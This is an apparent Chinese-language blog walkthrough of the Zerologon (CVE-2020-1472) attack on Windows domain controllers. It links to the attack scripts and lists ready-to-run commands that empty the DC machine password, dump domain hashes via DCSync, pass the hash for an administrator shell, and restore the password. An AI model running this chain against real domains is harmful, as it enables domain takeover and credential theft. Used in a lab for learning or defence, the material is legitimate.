Zerologon

Zerologon

Adil 6 2025-09-24

一、简介

  • ZerologonCVE-2020-1472,是一种针对于 DC 的攻击手法,其利用 NetLogon 认证缺陷等因素,可以将 DC 的机器账户密码强制变为空,随后即可利用 DC 的机器账户进行 DCSync 以此获取域内账户的密码哈希,进而使用 PTH 的攻击手法获取到域管身份,实现对目标域的接管!

  • 影响范围:Windows2008 —— Windows2019

  • 脚本下载:传送门(解压密码:gotarget.top

二、攻击利用

2.1 验证

  • python3 zerologon_tester.py dc 192.168.30.149

image-20240217171330852

2.2 密码置空

  • python3 CVE-2020-1472.py dc dc$ 192.168.30.149

image-20240217163401816

2.3 DCSync

2.3.1 Impacket(推荐)

  • 格式:python3 secretsdump.py 域/计算机名/$@目标IP -just-dc -no-pass

  • 示例:secretsdump.py decade.wsl/dc\$@192.168.30.157 -just-dc -no-pass

image-20240226131421243

2.3.2 CME(备选)

  • crackmapexec smb 192.168.30.149 -u dc$ -p '' --ntds

image-20240217163656943

2.4 PTH

  • evil-winrm -i 192.168.30.149 -u administrator -H <域管哈希>

image-20240217163945233

2.5 机器账户添加密码

  • 方式一:
    • python3 restorepassword.py tech/dc@dc -target-ip 192.168.30.149 -hexpass <16进制编码后的域管密码>

image-20240217170203300

  • 方式二
    • DC 使用域管权限重置:Reset-ComputerMachinePassword -Server dc

image-20240217170614575

  • 注:两种方式都将为机器账户随机创建一个强复杂度密码,因此也就无法使用空密码利用机器账户执行操作了!

image-20240217171024024